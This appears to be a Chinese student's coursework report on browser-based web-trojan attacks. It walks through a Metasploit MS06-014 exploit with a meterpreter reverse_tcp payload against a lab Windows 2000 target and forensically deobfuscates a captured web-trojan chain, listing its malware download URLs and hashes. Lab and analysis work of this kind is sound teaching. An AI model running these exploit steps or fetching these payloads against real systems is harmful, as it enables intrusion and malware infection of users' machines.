学号 20221904 《网络攻防实践》实践11报告

20221904张跃飞 2023-05-19 12:44:27

目录

  • 1.实践内容
  • 2.实践过程
  • 3.学习中遇到的问题及解决
  • 4.实践总结

1.实践内容

1.Web浏览器渗透攻击实验
任务:使用攻击机和Windows靶机进行浏览器渗透攻击实验,体验网页木马构造及实施浏览器攻击的实际过程。
2.取证分析实践—网页木马攻击场景分析
3.攻防对抗实践—web浏览器渗透攻击攻防
攻击方使用Metasploit构造出至少两个不同Web浏览端软件安全漏洞的渗透攻击代码,并进行混淆处理之后组装成一个URL,通过具有欺骗性的电子邮件发送给防守方。
防守方对电子邮件中的挂马链接进行提取、解混淆分析、尝试恢复出渗透代码的原始形态,并分析这些渗透代码都是攻击哪些Web浏览端软件的哪些安全漏洞。

木马程序介绍:木马病毒是指隐藏在正常程序中的一段具有特殊功能的恶意代码,是具备破坏和删除文件、发送密码、记录键盘和攻击Dos等特殊功能的后门程序。木马病毒其实是计算机黑客用于远程控制计算机的程序,将控制程序寄生于被控制的计算机系统中,里应外合,对被感染木马病毒的计算机实施操作。一般的木马病毒程序主要是寻找计算机后门,伺机窃取被控计算机中的密码和重要文件等。可以对被控计算机实施监控、资料修改等非法操作。木马病毒具有很强的隐蔽性,可以根据黑客意图突然发起攻击。

网页木马 (又称为[网马]) 是一个比较新的概念,它并不属于木马的一种,而是一种传播恶意代码的手段。用户在访问一个黑客恶意构造的 Web 页面以后会在不知情的情况下自己的系统被植入木马。网页木马利用了一些已知或者未知系统或者第三方软件的漏洞,然后悄悄下载病毒木马到用户计算机中并执行。

2.实践过程

实验一:Web浏览器渗透攻击实验
使用攻击机和Windows靶机进行浏览器渗透攻击实验,体验网页木马构造及实施浏览器攻击的实际过程。

所需环境:
攻击机Kali-Linux-2020.1-vmware-amd64 的攻击机使用其中安装的Metasploit渗透攻击框架软件;
靶机:未打补丁的Windows靶机,可使用Win2kServer_SP0_target靶机。

实验步骤:
1选择使用Metasploit中的MS06-014渗透攻击模块(ie_ createobject);
2选择PAYLOAD为任意远程Shell连接;
3设置服务器地址(SVRHOST或LHOST)和URL参数,运行exploit,构造出恶意网页木马脚本;
4在靶机环境中启动浏览器,验证与服务器的连通性,并访问恶意网页木马脚本URL;⑤在攻击机的Metasploit软件中查看渗透攻击状态,并通
过成功渗透攻击后建立起的远程控制会话SESSION,在靶机上远程执行命令。

本次实验使用的虚拟机为kali(IP:192.168.11.194)和Win2k(IP:192.168.200.124),并开启蜜罐保证连通性。

img

img

1.在kali中打开msfconsole

img

搜索MS06-014漏洞search MS06-014

img

选择module use 0
显示有效载荷show payloads

img

2.设置payload set payload windows/meterpreter/reverse_tcp

img

show options查看需要设置的参数

img

3.设置攻击机地址set LHOST 192.168.11.194
之后show options检查一下

img

4.攻击exploit,发现有个URL地址http://192.168.11.194:8080/hvoopFi7CjTyqqk,可能是题目那个有木马的恶意地址

img

5.在靶机中访问这个地址

img

过了一会发现显示一段英文字符,然后回到攻击机中,发现已经建立会话
我们输入session -i 1,渗透成功。

img

img

实验二:取证分析实践—网页木马攻击场景分析
1: 首先将start.html文件进行文本打开,我们可以看到一个new09.htm的网址,我们可以在以下两处找到这个链接。

img

2: 将这个链接用文本进行打开后,可以发现其用一个iframe标签引用了一个http://aa.18dd.net/aa/kl.htm文件,又用javascript引用了一个http://js.users.51.la/1299644.js文件。我们对它们分别作MD5散列,可以看到

img

img

3: 可以在目录中找到这两个文件,且使用文本方式打开这两个文件,其中7f60672dcd6b5e90b6772545ee219bd3是流量统计代码,不是木马;

img

img

4: 打开另一个文件后可以发现,其内容很复杂,但是我们可以在倒数第三行中看到t=utf8to16(xxtea_decrypt(base64decode(t), '\x73\x63\x72\x69\x70\x74'));可以发现,实际上这是一种被称为XXTEA+Base64的加密方法,对付这种加密方法,我们只要找到它的加密密钥就可以;

img

5: xxtea_decrypt函数的第二个参数就是密钥,我们使用base64进行解码后发现密钥是“script”。
6: 进入该网页可以对该文本进行xxtea解码,script就是密钥。

img

7: 解码后可以发现,其是经过十六进制加密的,因此可以在网页进行解密;

img

8: 解密后可以看到这个木马群,其应用到的应用程序有“Adodb.Stream”、“MPS.StormPlayer”、“POWERPLAYER.PowerPlayerCtrl.1”和“BaiduBar.Tool”,分别对应利用了微软数据库访问对象、暴风影音、PPStream和百度搜霸的漏洞。这些都是现在网络用户使用非常频繁的软件,其危害性可见一斑。另外,这个文件还引用三个js文件和一个压缩包(bd.cab,解开后是bd.exe)

img

img

9: 再按照说明的提示,对“http://aa.18dd.net/aa/1.js”、“http://aa.18dd.net/aa/b.js”、“http://aa.18dd.net/aa/pps.js”和“http://down.18dd.net/bb/bd.cab”作处理。分别对其进行哈希后可以看到如下:

MD5(http://aa.18dd.net/aa/1.js,32) = 5d7e9058a857aa2abee820d5473c5fa4
MD5(http://aa.18dd.net/aa/b.js,32) = 3870c28cc279d457746b3796a262f166
MD5(http://aa.18dd.net/aa/pps.js,32) = 5f0b8bf0385314dbe0e5ec95e6abedc2
MD5(http://down.18dd.net/bb/bd.cab,32) = 1c1d7b3539a617517c49eee4120783b2

img

img

img

img

10: 首先对第一个文件1.js进行分析,我们使用文本打开这个文件后,可以看到其是一个16进制编码的文件,因此我们可以使用上述的解密工具对其进行解密,解密后我们可以看到如下信息

img

img

11: 继续观察b.js,我们可以看到其有几个参数,分别为p,a,c,k,e,d,这是一种加密方式,我们可以使用该网页对其进行解密,对其解密后显示如下

img

img

12: 可以看到其中包含着大量ASCII码,我们将其进行组合后,可以构成一个完整的字符串,对其进行解密后,可以发现http://down.18dd.net/bb/bf.exe这样一个可执行文件。

img

13: 继续观察pps.js,可以发现如下内容

img

14: 其是由大量八进制构成,我们进行八进制解密后可以得到一段shellcode,我们和上述过程相似,对其进行解码,可以得到相应的可执行文件路径http://down.18dd.net/bb/pps.exe

img

15: 处理压缩文件,解压后可以得到一个bd.exe文件,同时对之前我们得到的三个文件进行Hash后,对应以下三个hash值

img

MD5(http://down.18dd.net/bb/014.exe,32) = ca4e4a1730b0f69a9b94393d9443b979
MD5(http://down.18dd.net/bb/bf.exe,32) = 268cbd59fbed235f6cf6b41b92b03f8e
MD5(http://down.18dd.net/bb/pps.exe,32) = ff59b3b8961f502289c1b4df8c37e2a4

16: 对这三个文件进行md5完整性检验后,发现其内容完全相同。

img

17: 对bd.exe进行脱壳后发现,其是用Delphi编写的

img

18: 使用w32DAsm对其进行反汇编后发现如图;

img

19: 这个程序会生成一个叫"Alletdel.bat"的脚本文件,这个文件中有一个标签叫"try",会不断的执行这个标签下一行的命令,命令内容可能是判断文件存在性,更改系统日期,删除某些文件;如(goto try",":try","Alletdel.bat","cmd /c date ","cmd /c date 1981-01-12","del "","del %0","if exist "")这些命令;这个程序可能在磁盘根目录下生成自动运行的文件,以求用户不小心时启动程序(":\AutoRun.inf","[AutoRun] open=","AutoRun.inf","shell\Auto\command=");这个程序要对IE、注册表、服务和系统文件进行改动;这个程序有一定的防系统保护软件的能力;这个程序要下载一堆木马.

img

20: 对这些木马文件进行hash计算,可得;
MD5(http://down.18dd.net/kl/0.exe,32) = f699dcff6930465939a8d60619372696
MD5(http://down.18dd.net/kl/1.exe,32) = 0c5abac0f26a574bafad01ebfa08cbfa
MD5(http://down.18dd.net/kl/2.exe,32) = 7ab83edbc8d2f2cdb879d2d9997dd381
MD5(http://down.18dd.net/kl/3.exe,32) = 6164f8cd47258cf5f98136b9e4164ec0
MD5(http://down.18dd.net/kl/4.exe,32) = c8620b1ee75fd54fbc98b25bd13d12c1
MD5(http://down.18dd.net/kl/5.exe,32) = a23cbbf6c2625dcc89ec5dc28b765133
MD5(http://down.18dd.net/kl/6.exe,32) = 7d023fd43d27d9dc9155e7e8a93b7861
MD5(http://down.18dd.net/kl/7.exe,32) = d6fe161bbf5e81aaf35861c938cb8bd1
MD5(http://down.18dd.net/kl/8.exe,32) = acc2bad4a01908c64d3640a96d34f16b
MD5(http://down.18dd.net/kl/9.exe,32) = 1f627136e4c23f76fa1bb66c76098e29
MD5(http://down.18dd.net/kl/10.exe,32) = c6c24984d53478b51fe3ee2616434d6f
MD5(http://down.18dd.net/kl/11.exe,32) = 248b26c81f565df38ec2b0444bbd3eea
MD5(http://down.18dd.net/kl/12.exe,32) = d59f870b2af3eebf264edd09352645e0
MD5(http://down.18dd.net/kl/13.exe,32) = 2506d70065b0accd2c94a0833846e7d8
MD5(http://down.18dd.net/kl/14.exe,32) = f9a339dc1a9e3e8449d47ab914f89804
MD5(http://down.18dd.net/kl/15.exe,32) = 18f9de3590a7d602863b406c181a7762
MD5(http://down.18dd.net/kl/16.exe,32) = 7d63bd5108983d6c67ed32865fefc27b
MD5(http://down.18dd.net/kl/17.exe,32) = 6536161fd92244f62eaac334c36db897
MD5(http://down.18dd.net/kl/18.exe,32) = 6c8d161464e5be8983f7fa42d5e09177
MD5(http://down.18dd.net/kl/19.exe,32) = 4b8597eeb55c107181bd5eb3aa8bfe3e

实验三:攻防对抗实践—web浏览器渗透攻击攻防

首先选择实验1中的MS06_014漏洞,重复先前步骤,在攻击前打开wireshark监听。执行攻击,获取恶意网站链接http://192.168.11.194:8080/hvoopFi7CjTyqqk,在靶机打开网站
返回攻击机的wireshark,观察从靶机发送给攻击机的信息

img

也可在浏览器右击查看源代码

img

追踪TCP流,发现一串很长很长的代码~而且有很多空格
经过反混淆和格式化处理后,得到如下的 JS 代码。
分析得出攻击者使用的漏洞是MS06-014。

img

3.学习中遇到的问题及解决

问题1:windows靶机连不上网 ,显示IP地址和网络冲突
问题1解决方案:改变网络配置
问题2:攻击机与靶机的连通性
问题2解决方案:开启蜜罐保证连通性

4.实践总结

网页木马是一种高效的网络入侵手段,操作简单,值需要防范

参考资料:
1.https://blog.csdn.net/m0_51545690/article/details/123384986?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522168438450116800180661701%2522%252C%2522scm%2522%253A%252220140713.130102334..%2522%257D&request_id=168438450116800180661701&biz_id=0&utm_medium=distribute.pc_search_result.none-task-blog-2~all~sobaiduend~default-1-123384986-null-null.142^v87^control_2,239^v2^insert_chatgpt&utm_term=session%20i&spm=1018.2226.3001.4187
2.https://blog.csdn.net/weixin_33670786/article/details/89865024?spm=1001.2101.3001.6650.1&utm_medium=distribute.pc_relevant.none-task-blog-2%7Edefault%7ECTRLIST%7ERate-1-89865024-blog-128268303.235%5Ev36%5Epc_relevant_default_base&depth_1-utm_source=distribute.pc_relevant.none-task-blog-2%7Edefault%7ECTRLIST%7ERate-1-89865024-blog-128268303.235%5Ev36%5Epc_relevant_default_base&utm_relevant_index=2
3.https://blog.csdn.net/qq_36531487/article/details/117467346?ops_request_misc=%257B%2522request%255Fid%2522%253A%2522168438479416800227442753%2522%252C%2522scm%2522%253A%252220140713.130102334.pc%255Fall.%2522%257D&request_id=168438479416800227442753&biz_id=0&utm_medium=distribute.pc_search_result.none-task-blog-2~all~first_rank_ecpm_v1~rank_v31_ecpm-17-117467346-null-null.142^v87^control_2,239^v2^insert_chatgpt&utm_term=ms06014&spm=1018.2226.3001.4187

...全文
73 回复 打赏 收藏 转发到动态 举报
写回复
用AI写文章
回复
切换为时间正序
请发表友善的回复…
发表回复

76

社区成员

发帖
与我相关
我的任务
社区描述
网络攻防实践作业
网络安全系统安全 高校
社区管理员
  • blackwall0321
加入社区
  • 近7日
  • 近30日
  • 至今
社区公告
暂无公告

试试用AI创作助手写篇文章吧